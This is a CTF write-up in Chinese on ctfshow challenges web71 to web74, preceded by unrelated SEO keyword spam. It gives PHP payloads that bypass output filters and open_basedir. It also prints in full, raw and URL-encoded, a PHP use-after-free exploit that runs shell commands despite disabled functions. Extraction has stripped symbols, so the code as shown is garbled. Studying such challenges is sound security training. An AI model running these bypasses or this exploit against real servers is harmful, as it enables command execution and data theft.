什么公司会招网站建设,网站登陆注册怎么做,在哪做网站建设,做ppt一般在什么网站好目录 1、web71
2、web72
3、web73
4、web74 1、web71 像上一题那样扫描但是输出全是问号 查看提示#xff1a;我们可以结合 exit() 函数执行php代码让后面的匹配缓冲区不执行直接退出。
payload#xff1a;
cvar_export(scandir(/));exit(); 同理读取 flag.txt
cinclud…目录 1、web71
2、web72
3、web73
4、web74 1、web71 像上一题那样扫描但是输出全是问号 查看提示我们可以结合 exit() 函数执行php代码让后面的匹配缓冲区不执行直接退出。
payload
cvar_export(scandir(/));exit(); 同理读取 flag.txt
cinclude(/flag.txt);exit(); ctfshow{a9800fd2-9767-40e5-a824-106718643f80}
才发现这道题给了 index.php 的源码 查看一下这里会将字母和数字都替换为问号进行输出 我们直接在执行完 include 包含语句后执行 exit 强制退出从而实现绕过 preg_replace 的执行。 2、web72
下载 index.php 发现与上一道题一样 但是目录扫描发现只有权限扫当前目录下的文件 无法扫到上层路径下的文件当然也包括根目录下的 尝试使用 scandir() 函数来扫描根目录但由于 open_basedir 限制这个操作被禁止了。 open_basedir 是 PHP 的一个安全配置指令用来限制 PHP 脚本只能访问特定的目录。 当前配置只允许访问 /var/www/html/ 目录及其子目录但不允许访问其他目录。 使用 glob:// 伪协议绕过 open_basedir读取根目录下的文件payload
c??php $anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
?或者不要 ??php 和 ?
c$anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
解释
$a new DirectoryIterator(glob:///*); // 创建一个DirectoryIterator对象遍历根目录
foreach ($a as $f) { // 遍历每个条目echo($f-__toString() . ); // 输出条目的名称并添加一个空格
}
exit(0); // 终止脚本执行c$aopendir(glob:///*); while (($file readdir($a)) ! false){echo $file . br; };exit();
解释
$a opendir(glob:///*); // 打开根目录并将目录句柄赋值给$a
while (($file readdir($a)) ! false) { // 循环读取目录中的每个条目echo $file . br; // 输出每个条目的名称并添加HTML换行标签
};
exit(); // 终止脚本执行发现存在 flag0.txt
利用uaf的脚本进行命令利用uaf的脚本进行命令执行执行
尝试执行ls /; cat /flag0.txt命令
c??php
pwn(ls /;cat /flag0.txt);function pwn($cmd) {global $abc, $helper, $backtrace;class Vuln {public $a;public function __destruct() { global $backtrace; unset($this-a);$backtrace (new Exception)-getTrace(); # ;)if(!isset($backtrace[1][args])) { # PHP 7.4$backtrace debug_backtrace();}}}class Helper {public $a, $b, $c, $d;}function str2ptr($str, $p 0, $s 8) {$address 0;for($j $s-1; $j 0; $j--) {$address 8;$address | ord($str[$p$j]);}return $address;}function ptr2str($ptr, $m 8) {$out ;for ($i0; $i $m; $i) {$out . sprintf(%c,$ptr 0xff);$ptr 8;}return $out;}function write($str, $p, $v, $n 8) {$i 0;for($i 0; $i $n; $i) {$str[$p $i] sprintf(%c,$v 0xff);$v 8;}}function leak($addr, $p 0, $s 8) {global $abc, $helper;write($abc, 0x68, $addr $p - 0x10);$leak strlen($helper-a);if($s ! 8) { $leak % 2 ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type leak($base, 0x10, 2);$e_phoff leak($base, 0x20);$e_phentsize leak($base, 0x36, 2);$e_phnum leak($base, 0x38, 2);for($i 0; $i $e_phnum; $i) {$header $base $e_phoff $i * $e_phentsize;$p_type leak($header, 0, 4);$p_flags leak($header, 4, 4);$p_vaddr leak($header, 0x10);$p_memsz leak($header, 0x28);if($p_type 1 $p_flags 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr $e_type 2 ? $p_vaddr : $base $p_vaddr;$data_size $p_memsz;} else if($p_type 1 $p_flags 5) { # PT_LOAD, PF_Read_exec$text_size $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) $elf;for($i 0; $i $data_size / 8; $i) {$leak leak($data_addr, $i * 8);if($leak - $base 0 $leak - $base $data_addr - $base) {$deref leak($leak);# constant constant checkif($deref ! 0x746e6174736e6f63)continue;} else continue;$leak leak($data_addr, ($i 4) * 8);if($leak - $base 0 $leak - $base $data_addr - $base) {$deref leak($leak);# bin2hex constant checkif($deref ! 0x786568326e6962)continue;} else continue;return $data_addr $i * 8;}}function get_binary_base($binary_leak) {$base 0;$start $binary_leak 0xfffffffffffff000;for($i 0; $i 0x1000; $i) {$addr $start - 0x1000 * $i;$leak leak($addr, 0, 7);if($leak 0x10102464c457f) { # ELF headerreturn $addr;}}}function get_system($basic_funcs) {$addr $basic_funcs;do {$f_entry leak($addr);$f_name leak($f_entry, 0, 6);if($f_name 0x6d6574737973) { # systemreturn leak($addr 8);}$addr 0x20;} while($f_entry ! 0);return false;}function trigger_uaf($arg) {# str_shuffle prevents opcache string interning$arg str_shuffle(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA);$vuln new Vuln();$vuln-a $arg;}if(stristr(PHP_OS, WIN)) {die(This PoC is for *nix systems only.);}$n_alloc 10; # increase this value if UAF fails$contiguous [];for($i 0; $i $n_alloc; $i)$contiguous[] str_shuffle(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA);trigger_uaf(x);$abc $backtrace[1][args][0];$helper new Helper;$helper-b function ($x) { };if(strlen($abc) 79 || strlen($abc) 0) {die(UAF failed);}# leaks$closure_handlers str2ptr($abc, 0);$php_heap str2ptr($abc, 0x58);$abc_addr $php_heap - 0xc8;# fake valuewrite($abc, 0x60, 2);write($abc, 0x70, 6);# fake referencewrite($abc, 0x10, $abc_addr 0x60);write($abc, 0x18, 0xa);$closure_obj str2ptr($abc, 0x20);$binary_leak leak($closure_handlers, 8);if(!($base get_binary_base($binary_leak))) {die(Couldnt determine binary base address);}if(!($elf parse_elf($base))) {die(Couldnt parse ELF header);}if(!($basic_funcs get_basic_funcs($base, $elf))) {die(Couldnt get basic_functions address);}if(!($zif_system get_system($basic_funcs))) {die(Couldnt get zif_system address);}# fake closure object$fake_obj_offset 0xd0;for($i 0; $i 0x110; $i 8) {write($abc, $fake_obj_offset $i, leak($closure_obj, $i));}# pwnwrite($abc, 0x20, $abc_addr $fake_obj_offset);write($abc, 0xd0 0x38, 1, 4); # internal func typewrite($abc, 0xd0 0x68, $zif_system); # internal func handler($helper-b)($cmd);exit();
}
URL 编码后传入payload
c%3f%3e%3c%3fphp%0apwn(%22ls%2f%3bcat%2fflag0.txt%22)%3b%0a%0afunctionpwn(%24cmd)%7b%0aglobal%24abc%2c%24helper%2c%24backtrace%3b%0aclassVuln%7b%0apublic%24a%3b%0apublicfunction__destruct()%7b%0aglobal%24backtrace%3b%0aunset(%24this-%3ea)%3b%0a%24backtrace%3d(newException)-%3egetTrace()%3b%23%3b)%0aif(!isset(%24backtrace%5b1%5d%5b%27args%27%5d))%7b%23PHP%3e%3d7.4%0a%24backtrace%3ddebug_backtrace()%3b%0a%7d%0a%7d%0a%7d%0a%0aclassHelper%7b%0apublic%24a%2c%24b%2c%24c%2c%24d%3b%0a%7d%0a%0afunctionstr2ptr(%26%24str%2c%24p%3d0%2c%24s%3d8)%7b%0a%24address%3d0%3b%0afor(%24j%3d%24s-1%3b%24j%3e%3d0%3b%24j--)%7b%0a%24address%3c%3c%3d8%3b%0a%24address%7c%3dord(%24str%5b%24p%2b%24j%5d)%3b%0a%7d%0areturn%24address%3b%0a%7d%0a%0afunctionptr2str(%24ptr%2c%24m%3d8)%7b%0a%24out%3d%22%22%3b%0afor(%24i%3d0%3b%24i%3c%24m%3b%24i%2b%2b)%7b%0a%24out.%3dsprintf(%27%25c%27%2c%24ptr%260xff)%3b%0a%24ptr%3e%3e%3d8%3b%0a%7d%0areturn%24out%3b%0a%7d%0a%0afunctionwrite(%26%24str%2c%24p%2c%24v%2c%24n%3d8)%7b%0a%24i%3d0%3b%0afor(%24i%3d0%3b%24i%3c%24n%3b%24i%2b%2b)%7b%0a%24str%5b%24p%2b%24i%5d%3dsprintf(%27%25c%27%2c%24v%260xff)%3b%0a%24v%3e%3e%3d8%3b%0a%7d%0a%7d%0a%0afunctionleak(%24addr%2c%24p%3d0%2c%24s%3d8)%7b%0aglobal%24abc%2c%24helper%3b%0awrite(%24abc%2c0x68%2c%24addr%2b%24p-0x10)%3b%0a%24leak%3dstrlen(%24helper-%3ea)%3b%0aif(%24s!%3d8)%7b%24leak%25%3d2%3c%3c(%24s*8)-1%3b%7d%0areturn%24leak%3b%0a%7d%0a%0afunctionparse_elf(%24base)%7b%0a%24e_type%3dleak(%24base%2c0x10%2c2)%3b%0a%0a%24e_phoff%3dleak(%24base%2c0x20)%3b%0a%24e_phentsize%3dleak(%24base%2c0x36%2c2)%3b%0a%24e_phnum%3dleak(%24base%2c0x38%2c2)%3b%0a%0afor(%24i%3d0%3b%24i%3c%24e_phnum%3b%24i%2b%2b)%7b%0a%24header%3d%24base%2b%24e_phoff%2b%24i*%24e_phentsize%3b%0a%24p_type%3dleak(%24header%2c0%2c4)%3b%0a%24p_flags%3dleak(%24header%2c4%2c4)%3b%0a%24p_vaddr%3dleak(%24header%2c0x10)%3b%0a%24p_memsz%3dleak(%24header%2c0x28)%3b%0a%0aif(%24p_type%3d%3d1%26%26%24p_flags%3d%3d6)%7b%23PT_LOAD%2cPF_Read_Write%0a%23handlepie%0a%24data_addr%3d%24e_type%3d%3d2%3f%24p_vaddr%3a%24base%2b%24p_vaddr%3b%0a%24data_size%3d%24p_memsz%3b%0a%7delseif(%24p_type%3d%3d1%26%26%24p_flags%3d%3d5)%7b%23PT_LOAD%2cPF_Read_exec%0a%24text_size%3d%24p_memsz%3b%0a%7d%0a%7d%0a%0aif(!%24data_addr%7c%7c!%24text_size%7c%7c!%24data_size)%0areturnfalse%3b%0a%0areturn%5b%24data_addr%2c%24text_size%2c%24data_size%5d%3b%0a%7d%0a%0afunctionget_basic_funcs(%24base%2c%24elf)%7b%0alist(%24data_addr%2c%24text_size%2c%24data_size)%3d%24elf%3b%0afor(%24i%3d0%3b%24i%3c%24data_size%2f8%3b%24i%2b%2b)%7b%0a%24leak%3dleak(%24data_addr%2c%24i*8)%3b%0aif(%24leak-%24base%3e0%26%26%24leak-%24base%3c%24data_addr-%24base)%7b%0a%24deref%3dleak(%24leak)%3b%0a%23%27constant%27constantcheck%0aif(%24deref!%3d0x746e6174736e6f63)%0acontinue%3b%0a%7delsecontinue%3b%0a%0a%24leak%3dleak(%24data_addr%2c(%24i%2b4)*8)%3b%0aif(%24leak-%24base%3e0%26%26%24leak-%24base%3c%24data_addr-%24base)%7b%0a%24deref%3dleak(%24leak)%3b%0a%23%27bin2hex%27constantcheck%0aif(%24deref!%3d0x786568326e6962)%0acontinue%3b%0a%7delsecontinue%3b%0a%0areturn%24data_addr%2b%24i*8%3b%0a%7d%0a%7d%0a%0afunctionget_binary_base(%24binary_leak)%7b%0a%24base%3d0%3b%0a%24start%3d%24binary_leak%260xfffffffffffff000%3b%0afor(%24i%3d0%3b%24i%3c0x1000%3b%24i%2b%2b)%7b%0a%24addr%3d%24start-0x1000*%24i%3b%0a%24leak%3dleak(%24addr%2c0%2c7)%3b%0aif(%24leak%3d%3d0x10102464c457f)%7b%23ELFheader%0areturn%24addr%3b%0a%7d%0a%7d%0a%7d%0a%0afunctionget_system(%24basic_funcs)%7b%0a%24addr%3d%24basic_funcs%3b%0ado%7b%0a%24f_entry%3dleak(%24addr)%3b%0a%24f_name%3dleak(%24f_entry%2c0%2c6)%3b%0a%0aif(%24f_name%3d%3d0x6d6574737973)%7b%23system%0areturnleak(%24addr%2b8)%3b%0a%7d%0a%24addr%2b%3d0x20%3b%0a%7dwhile(%24f_entry!%3d0)%3b%0areturnfalse%3b%0a%7d%0a%0afunctiontrigger_uaf(%24arg)%7b%0a%23str_shufflepreventsopcachestringinterning%0a%24arg%3dstr_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%24vuln%3dnewVuln()%3b%0a%24vuln-%3ea%3d%24arg%3b%0a%7d%0a%0aif(stristr(PHP_OS%2c%27WIN%27))%7b%0adie(%27ThisPoCisfor*nixsystemsonly.%27)%3b%0a%7d%0a%0a%24n_alloc%3d10%3b%23increasethisvalueifUAFfails%0a%24contiguous%3d%5b%5d%3b%0afor(%24i%3d0%3b%24i%3c%24n_alloc%3b%24i%2b%2b)%0a%24contiguous%5b%5d%3dstr_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%0atrigger_uaf(%27x%27)%3b%0a%24abc%3d%24backtrace%5b1%5d%5b%27args%27%5d%5b0%5d%3b%0a%0a%24helper%3dnewHelper%3b%0a%24helper-%3eb%3dfunction(%24x)%7b%7d%3b%0a%0aif(strlen(%24abc)%3d%3d79%7c%7cstrlen(%24abc)%3d%3d0)%7b%0adie(%22UAFfailed%22)%3b%0a%7d%0a%0a%23leaks%0a%24closure_handlers%3dstr2ptr(%24abc%2c0)%3b%0a%24php_heap%3dstr2ptr(%24abc%2c0x58)%3b%0a%24abc_addr%3d%24php_heap-0xc8%3b%0a%0a%23fakevalue%0awrite(%24abc%2c0x60%2c2)%3b%0awrite(%24abc%2c0x70%2c6)%3b%0a%0a%23fakereference%0awrite(%24abc%2c0x10%2c%24abc_addr%2b0x60)%3b%0awrite(%24abc%2c0x18%2c0xa)%3b%0a%0a%24closure_obj%3dstr2ptr(%24abc%2c0x20)%3b%0a%0a%24binary_leak%3dleak(%24closure_handlers%2c8)%3b%0aif(!(%24base%3dget_binary_base(%24binary_leak)))%7b%0adie(%22Couldn%27tdeterminebinarybaseaddress%22)%3b%0a%7d%0a%0aif(!(%24elf%3dparse_elf(%24base)))%7b%0adie(%22Couldn%27tparseELFheader%22)%3b%0a%7d%0a%0aif(!(%24basic_funcs%3dget_basic_funcs(%24base%2c%24elf)))%7b%0adie(%22Couldn%27tgetbasic_functionsaddress%22)%3b%0a%7d%0a%0aif(!(%24zif_system%3dget_system(%24basic_funcs)))%7b%0adie(%22Couldn%27tgetzif_systemaddress%22)%3b%0a%7d%0a%0a%23fakeclosureobject%0a%24fake_obj_offset%3d0xd0%3b%0afor(%24i%3d0%3b%24i%3c0x110%3b%24i%2b%3d8)%7b%0awrite(%24abc%2c%24fake_obj_offset%2b%24i%2cleak(%24closure_obj%2c%24i))%3b%0a%7d%0a%0a%23pwn%0awrite(%24abc%2c0x20%2c%24abc_addr%2b%24fake_obj_offset)%3b%0awrite(%24abc%2c0xd0%2b0x38%2c1%2c4)%3b%23internalfunctype%0awrite(%24abc%2c0xd0%2b0x68%2c%24zif_system)%3b%23internalfunchandler%0a%0a(%24helper-%3eb)(%24cmd)%3b%0aexit()%3b%0a%7d 拿到 flagctfshow{3deb8d00-68e6-4c20-a971-3fbf3382ec45} 3、web73
用上一题的方法先读
c$anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
发现根目录下存在 flagc.txt 也可以使用前面的目录扫描
cvar_export(scandir(/));exit(); 还可以使用 echo 输出指定数组索引的文件
cecho(scandir(/)[6]);exit(); 这道题可以直接使用 include 进行包含
cinclude(/flagc.txt);exit(0); 拿到 flagctfshow{8fccf5bc-5681-4815-b7ce-0b81772b6f7c} 4、web74
scandir() 又被禁用了 采用 glob 协议读取
c$aopendir(glob:///*); while (($file readdir($a)) ! false){echo $file . br; };exit();
存在 flagx.txt 包含
cinclude(/flagx.txt);exit(); 拿到 flagctfshow{35309fb4-36c5-4080-874a-6eaa85e03ff0}
